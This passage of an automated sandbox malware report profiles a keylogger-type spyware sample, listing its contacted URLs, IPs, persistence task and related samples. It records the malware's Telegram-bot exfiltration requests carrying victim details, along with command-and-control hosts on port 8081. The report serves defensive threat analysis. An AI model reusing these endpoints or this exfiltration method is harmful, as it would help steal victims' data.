https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2010:09:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2015:48:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://api.telegram.org	3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://api.telegram.org/bot	3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
http://www.fontbureau.com/designers?	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/lB	3140, EUR.exe, 00000008.00000002.4122819893.00000000031FC000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033ED000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.tiro.com	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	3140, EUR.exe, 00000008.00000002.4122819893.0000000003117000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413B000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004162000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040ED000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004480000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000044CE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432A000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000045A4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004351000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042DC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.kr	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=en	lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033C1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://varders.kozow.com:8081	3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://quicklyserv.com	3140, EUR.exe, 00000008.00000002.4122819893.000000000319E000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000338F000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	3140, EUR.exe, 00000008.00000002.4131086407.00000000040CA000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004390000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413E000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040F5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004487000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000457F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000445C000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042B8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	3140, EUR.exe, 00000008.00000002.4122819893.00000000031CB000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033BC000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.galapagosdesign.com/DPlease	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	3140, EUR.exe, 00000000.00000002.1727021709.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1802993888.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.000000000305F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000324F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/	lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033E3000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.apache.org/licenses/LICENSE-2.0	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.fontbureau.com	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	3140, EUR.exe, 00000008.00000002.4122819893.0000000003117000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413B000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004292000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004162000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040ED000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004480000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000044CE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432A000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000045A4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004351000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042DC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20a	3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://www.carterandcone.coml	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://aborters.duckdns.org:8081	3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?L	3140, EUR.exe, 00000008.00000002.4122819893.000000000318E000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000337F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	3140, EUR.exe, 00000008.00000002.4122819893.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003089000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003279000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anotherarmy.dns.army:8081	3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.jiyu-kobo.co.jp/	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	3140, EUR.exe, 00000008.00000002.4122819893.000000000305F000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	3140, EUR.exe, 00000008.00000002.4131086407.00000000040CA000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004390000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413E000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040F5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004487000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000457F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000445C000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042B8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
45.143.99.52	quicklyserv.com	Turkey	208485	EKSENBILISIMTR	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1522669
Start date and time:	2024-09-30 15:02:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	3140, EUR.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@23/15@4/4
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 99% Number of executed functions: 309 Number of non-executed functions: 43
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 3140, EUR.exe, PID 7180 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:02:57	API Interceptor	7765030x Sleep call for process: 3140, EUR.exe modified
09:03:02	API Interceptor	32x Sleep call for process: powershell.exe modified
09:03:04	API Interceptor	5365718x Sleep call for process: lkuPOyvaWlIu.exe modified
14:03:03	Task Scheduler	Run new task: lkuPOyvaWlIu path: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SYSN ORDER.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	58ADE05412907F657812BDA267C43288EA79418091.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	New Order.doc	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	new shipment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	update SOA.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	GEsD6lobvy.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	checkip.dyndns.org/
	Payment Advice.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	#docs_8299010377388200191-pdf.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
149.154.167.220	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse
	https://contact-us-business-help-home-64844114956.on-fleek.app/	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	58ADE05412907F657812BDA267C43288EA79418091.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	0LpFv1haTA.exe	Get hash	malicious	WhiteSnake Stealer, XenoRAT	Browse
	0225139776.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	.05.2024.exe	Get hash	malicious	Snake Keylogger	Browse
	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
45.143.99.52	Ziraat Bankas#U0131 Swift Mesaj#U0131_Report9278837374.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Swift E-Posta Bildirimi_2024-09-23_T11511900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12	Get hash	malicious	HTMLPhisher	Browse
	https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12	Get hash	malicious	HTMLPhisher	Browse
	https://dscoco.com/documentattached/secure.html	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Italya301 Kurumlu projesi_SLG620-50mm%0190%_ img .exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SYSN ORDER.xls	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	58ADE05412907F657812BDA267C43288EA79418091.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	New Order.doc	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	0225139776.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.AutoIt.1503.25057.26595.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	update SOA.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	.05.2024.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
quicklyserv.com	Ziraat Bankas#U0131 Swift Mesaj#U0131_Report9278837374.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	45.143.99.52
quicklyserv.com	Swift E-Posta Bildirimi_2024-09-23_T11511900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	45.143.99.52
api.telegram.org	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://contact-us-business-help-home-64844114956.on-fleek.app/	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	58ADE05412907F657812BDA267C43288EA79418091.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	0LpFv1haTA.exe	Get hash	malicious	WhiteSnake Stealer, XenoRAT	Browse	149.154.167.220
	0225139776.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	.05.2024.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
checkip.dyndns.com	Italya301 Kurumlu projesi_SLG620-50mm%0190%_ img .exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	SYSN ORDER.xls	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
